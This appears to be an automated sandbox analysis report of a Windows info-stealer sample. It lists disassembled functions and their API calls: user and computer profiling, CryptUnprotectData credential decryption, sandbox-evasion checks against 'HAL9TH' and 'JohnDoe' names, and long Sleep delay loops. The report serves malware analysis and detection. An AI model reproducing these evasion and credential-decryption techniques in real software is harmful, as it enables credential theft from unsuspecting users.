                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 186290926-0
                                                        • Opcode ID: eed43f2604decc05ba7b3617986e10115e7cd4ff84a8fba7a931ab800078dc01
                                                        • Instruction ID: 7d67d09dd7caa95158c10d26cbb431f080c311d9621e419cc38178db9953bcc5
                                                        • Opcode Fuzzy Hash: eed43f2604decc05ba7b3617986e10115e7cd4ff84a8fba7a931ab800078dc01
                                                        • Instruction Fuzzy Hash: 5F018C71904618DADB219FA0CC19BEFBBBCEF06344F00807AE801E2251D7788A09CFE5
                                                        Function 0040E7F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E802
                                                        • HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E809
                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0040E81D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocNameProcessUser
                                                        • String ID: HAL9TH
                                                        • API String ID: 1206570057-1811034163
                                                        • Opcode ID: 618754055a62d14384cc8a7ff5e1a208eb56d56a7f8126167233f456c5e553ef
                                                        • Instruction ID: 73064ae2fae14d5adbdf756814c1eab1b34abaad6351e116f5c76d1cf2fdcc72
                                                        • Opcode Fuzzy Hash: 618754055a62d14384cc8a7ff5e1a208eb56d56a7f8126167233f456c5e553ef
                                                        • Instruction Fuzzy Hash: 41D05BB9200204BFE7005797DD4DECABEBCD788755F004065FA01D2190D5F09A448634
                                                        Function 0040E8BD Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00421414,?,Computer Name: ,00000000,?,00421414,00000000,?,00000000,00000000,?,AV: ,00000000,?), ref: 0040E8CE
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E8D5
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E8E4
                                                        • wsprintfA.USER32 ref: 0040E902
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 362916592-0
                                                        • Opcode ID: 38d7ed90f759bce306bb511be55fbe317e0f2705a98d9cf4d88485bbe2a0c11d
                                                        • Instruction ID: 845d9c8c6c177748490a93975f83ee495143bb047f7b20190d3b330b59bb8e72
                                                        • Opcode Fuzzy Hash: 38d7ed90f759bce306bb511be55fbe317e0f2705a98d9cf4d88485bbe2a0c11d
                                                        • Instruction Fuzzy Hash: 42E0E571701224BBD7107B68AC4DE863659AB43320F000611F512D11D0D6B48900CAE1
                                                        Function 00406AB6 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406AD9
                                                        • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406AF1
                                                        • LocalFree.KERNEL32(?), ref: 00406B0F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                        • String ID:
                                                        • API String ID: 2068576380-0
                                                        • Opcode ID: 8f1af916246e53bc17e8679b2503cbe023cfe028ce6154d6d6397dbfcb7d4270
                                                        • Instruction ID: 6b09e03d3f9cff48dda0abda229e0eabffc8974c6a2ba1738b988b9fda050792
                                                        • Opcode Fuzzy Hash: 8f1af916246e53bc17e8679b2503cbe023cfe028ce6154d6d6397dbfcb7d4270
                                                        • Instruction Fuzzy Hash: 4E0119B6A00218AFDB11DFE8DC888DEBBF9EF48300B14096AF901E7250D3759950CFA0
                                                        Function 0040EA64 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2452939696-0
                                                        • Opcode ID: f9106cd0ee899643fe73d6dfacb8aa190e4456c9838fd4ec49fe7f694b20ff2b
                                                        • Instruction ID: afe3825a953cce474686337454f432047f696b4aaf104e3a5303f2467c3a0066
                                                        • Opcode Fuzzy Hash: f9106cd0ee899643fe73d6dfacb8aa190e4456c9838fd4ec49fe7f694b20ff2b
                                                        • Instruction Fuzzy Hash: 28D012B180011D97CB00EB90FC899C977BCAB04304F400561A701F2090E2B4961A8FD5
                                                        Function 00415730 Relevance: 361.0, APIs: 202, Strings: 4, Instructions: 481sleeplibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004010B4: MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 004010D4
                                                          • Part of subcall function 004010B4: GetLastError.KERNEL32(?,?,?,0041573E), ref: 004010DA
                                                          • Part of subcall function 004010B4: SetCriticalSectionSpinCount.KERNEL32(00000000,00000000,?,?,?,0041573E), ref: 004010E2
                                                          • Part of subcall function 004010B4: GetWindowContextHelpId.USER32(00000000), ref: 004010E9
                                                          • Part of subcall function 004010B4: GetWindowLongW.USER32(00000000,00000000), ref: 004010F1
                                                          • Part of subcall function 004010B4: RegisterClassW.USER32(00000000), ref: 004010F8
                                                          • Part of subcall function 004010B4: IsWindowVisible.USER32(00000000), ref: 004010FF
                                                          • Part of subcall function 004010B4: ConvertDefaultLocale.KERNEL32(00000000,?,?,?,0041573E), ref: 00401106
                                                          • Part of subcall function 004010B4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041573E), ref: 00401112
                                                          • Part of subcall function 004010B4: IsDialogMessageW.USER32(00000000,00000000), ref: 0040111A
                                                          • Part of subcall function 004010B4: GetProcessHeap.KERNEL32(00000000,?,?,?,?,0041573E), ref: 00401124
                                                          • Part of subcall function 004010B4: HeapFree.KERNEL32(00000000,?,?,?,0041573E), ref: 0040112B
                                                          • Part of subcall function 00401134: GetTempPathW.KERNEL32(00000104,?), ref: 00401154
                                                          • Part of subcall function 00401134: wsprintfW.USER32 ref: 0040117A
                                                          • Part of subcall function 00401134: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004011AA
                                                          • Part of subcall function 00401134: GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004011BF
                                                          • Part of subcall function 00401134: RtlAllocateHeap.NTDLL(00000000), ref: 004011C6
                                                          • Part of subcall function 00401134: _time64.MSVCRT ref: 004011CF
                                                          • Part of subcall function 00401134: srand.MSVCRT ref: 004011D5
                                                          • Part of subcall function 00401134: rand.MSVCRT ref: 004011DA
                                                          • Part of subcall function 00401134: memset.MSVCRT ref: 004011EA
                                                          • Part of subcall function 00401134: WriteFile.KERNEL32(?,00000000,000FFFFF,000007CE,00000000), ref: 004011FC
                                                          • Part of subcall function 00401134: memset.MSVCRT ref: 00401216
                                                          • Part of subcall function 00401134: FindCloseChangeNotification.KERNEL32(?), ref: 00401221
                                                          • Part of subcall function 00401134: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040123D
                                                          • Part of subcall function 00401134: ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00401253
                                                        • LoadLibraryA.KERNEL32(000007CE), ref: 0041574F
                                                        • GetProcAddress.KERNEL32(00000000,Sleep), ref: 0041576B
                                                        • Sleep.KERNEL32(00000014), ref: 00415776
                                                        • Sleep.KERNEL32(00000014), ref: 00415779
                                                        • Sleep.KERNEL32(00000014), ref: 00415780
                                                        • Sleep.KERNEL32(00000014), ref: 00415787
                                                        • Sleep.KERNEL32(00000014), ref: 0041578E
                                                        • Sleep.KERNEL32(00000014), ref: 00415795
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 004157A1
                                                        • Sleep.KERNEL32(00000014), ref: 004157A9
                                                        • Sleep.KERNEL32(00000014), ref: 004157B0
                                                        • Sleep.KERNEL32(00000014), ref: 004157B7
                                                        • Sleep.KERNEL32(00000014), ref: 004157BE
                                                        • Sleep.KERNEL32(00000014), ref: 004157C5
                                                        • Sleep.KERNEL32(00000014), ref: 004157CC
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 004157D8
                                                        • Sleep.KERNEL32(0000000C), ref: 004157E8
                                                        • Sleep.KERNEL32(0000000C), ref: 004157EF
                                                        • Sleep.KERNEL32(0000000C), ref: 004157F6
                                                        • Sleep.KERNEL32(0000000C), ref: 004157FD
                                                        • Sleep.KERNEL32(0000000C), ref: 00415804
                                                        • Sleep.KERNEL32(0000000C), ref: 0041580B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415812
                                                        • Sleep.KERNEL32(0000000C), ref: 00415819
                                                        • Sleep.KERNEL32(0000000C), ref: 00415820
                                                        • Sleep.KERNEL32(0000000C), ref: 00415827
                                                        • Sleep.KERNEL32(0000000C), ref: 0041582E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415835
                                                        • Sleep.KERNEL32(0000000C), ref: 0041583C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415843
                                                        • Sleep.KERNEL32(0000000C), ref: 0041584A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415851
                                                        • Sleep.KERNEL32(0000000C), ref: 00415858
                                                        • Sleep.KERNEL32(0000000C), ref: 0041585F
                                                        • Sleep.KERNEL32(0000000C), ref: 0041586B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415872
                                                        • Sleep.KERNEL32(0000000C), ref: 00415879
                                                        • Sleep.KERNEL32(0000000C), ref: 00415880
                                                        • Sleep.KERNEL32(0000000C), ref: 00415887
                                                        • Sleep.KERNEL32(0000000C), ref: 0041588E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415895
                                                        • Sleep.KERNEL32(0000000C), ref: 0041589C
                                                        • Sleep.KERNEL32(0000000C), ref: 004158A3
                                                        • Sleep.KERNEL32(0000000C), ref: 004158AA
                                                        • Sleep.KERNEL32(0000000C), ref: 004158B1
                                                        • Sleep.KERNEL32(0000000C), ref: 004158B8
                                                        • Sleep.KERNEL32(0000000C), ref: 004158BF
                                                        • Sleep.KERNEL32(0000000C), ref: 004158C6
                                                        • Sleep.KERNEL32(0000000C), ref: 004158CD
                                                        • Sleep.KERNEL32(0000000C), ref: 004158D4
                                                        • Sleep.KERNEL32(0000000C), ref: 004158DB
                                                        • Sleep.KERNEL32(0000000C), ref: 004158E2
                                                        • Sleep.KERNEL32(0000000C), ref: 004158EE
                                                        • Sleep.KERNEL32(0000000C), ref: 004158F5
                                                        • Sleep.KERNEL32(0000000C), ref: 004158FC
                                                        • Sleep.KERNEL32(0000000C), ref: 00415903
                                                        • Sleep.KERNEL32(0000000C), ref: 0041590A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415911
                                                        • Sleep.KERNEL32(0000000C), ref: 00415918
                                                        • Sleep.KERNEL32(0000000C), ref: 0041591F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415926
                                                        • Sleep.KERNEL32(0000000C), ref: 0041592D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415934
                                                        • Sleep.KERNEL32(0000000C), ref: 0041593B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415942
                                                        • Sleep.KERNEL32(0000000C), ref: 00415949
                                                        • Sleep.KERNEL32(0000000C), ref: 00415950
                                                        • Sleep.KERNEL32(0000000C), ref: 00415957
                                                        • Sleep.KERNEL32(0000000C), ref: 0041595E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415965
                                                          • Part of subcall function 00401043: strcmp.MSVCRT ref: 0040104E
                                                          • Part of subcall function 00401043: strcmp.MSVCRT ref: 00401064
                                                          • Part of subcall function 00401043: ExitProcess.KERNEL32 ref: 00401070
                                                        • Sleep.KERNEL32(0000000C), ref: 00415971
                                                        • Sleep.KERNEL32(0000000C), ref: 00415978
                                                        • Sleep.KERNEL32(0000000C), ref: 0041597F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415986
                                                        • Sleep.KERNEL32(0000000C), ref: 0041598D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415994
                                                        • Sleep.KERNEL32(0000000C), ref: 0041599B
                                                        • Sleep.KERNEL32(0000000C), ref: 004159A2
                                                        • Sleep.KERNEL32(0000000C), ref: 004159A9
                                                        • Sleep.KERNEL32(0000000C), ref: 004159B0
                                                        • Sleep.KERNEL32(0000000C), ref: 004159B7
                                                        • Sleep.KERNEL32(0000000C), ref: 004159BE
                                                        • Sleep.KERNEL32(0000000C), ref: 004159C5
                                                        • Sleep.KERNEL32(0000000C), ref: 004159CC
                                                        • Sleep.KERNEL32(0000000C), ref: 004159D3
                                                        • Sleep.KERNEL32(0000000C), ref: 004159DA
                                                        • Sleep.KERNEL32(0000000C), ref: 004159E1
                                                        • Sleep.KERNEL32(0000000C), ref: 004159E8
                                                        • Sleep.KERNEL32(0000000C), ref: 004159F4
                                                        • Sleep.KERNEL32(0000000C), ref: 004159FB
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A02
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A09
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A10
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A17
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A1E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A25
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A2C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A33
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A3A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A41
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A48
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A4F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A56
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A5D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A64
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A6B
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415E9F
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415EB6
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415ECD
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415EE4
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415EFB
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F12
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F29
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F40
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F57
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F6E
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F85
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415F9C
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415FB3
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415FCA
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415FE1
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00415FF8
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 0041600F
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00416026
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 0041603D
                                                          • Part of subcall function 00415E5B: GetProcAddress.KERNEL32 ref: 00416054
                                                          • Part of subcall function 00415E5B: LoadLibraryA.KERNEL32(00415A76), ref: 00416065
                                                          • Part of subcall function 00415E5B: LoadLibraryA.KERNEL32 ref: 00416076
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A77
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A7E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A85
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A8C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A93
                                                        • Sleep.KERNEL32(0000000C), ref: 00415A9A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AA1
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AA8
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AAF
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AB6
                                                        • Sleep.KERNEL32(0000000C), ref: 00415ABD
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AC4
                                                        • Sleep.KERNEL32(0000000C), ref: 00415ACB
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AD2
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AD9
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AE0
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AE7
                                                        • Sleep.KERNEL32(0000000C), ref: 00415AEE
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • Sleep.KERNEL32(0000000C,0041E266), ref: 00415B02
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B09
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B10
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B17
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B1E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B25
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B2C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B33
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B3A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B41
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B48
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B4F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B56
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B5D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B64
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B6B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B72
                                                        • Sleep.KERNEL32(0000000C), ref: 00415B79
                                                          • Part of subcall function 0040E7F6: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E802
                                                          • Part of subcall function 0040E7F6: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E809
                                                          • Part of subcall function 0040E7F6: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E81D
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00421420,?,00000000), ref: 00415BE4
                                                        • CloseHandle.KERNEL32(00000000), ref: 00415BEF
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00415C00
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415C16
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C1F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C26
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C2D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C34
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C3B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C42
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C49
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C50
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C57
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C5E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C65
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C6C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C73
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C7A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C81
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C88
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C8F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C96
                                                        • Sleep.KERNEL32(0000000C), ref: 00415C9D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CA4
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CAB
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CB2
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CB9
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CC0
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CC7
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CCE
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CD5
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CDC
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CE3
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CEA
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CF1
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CF8
                                                        • Sleep.KERNEL32(0000000C), ref: 00415CFF
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D06
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D0D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D14
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D20
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D27
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D2E
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D35
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D3C
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D43
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D4A
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D51
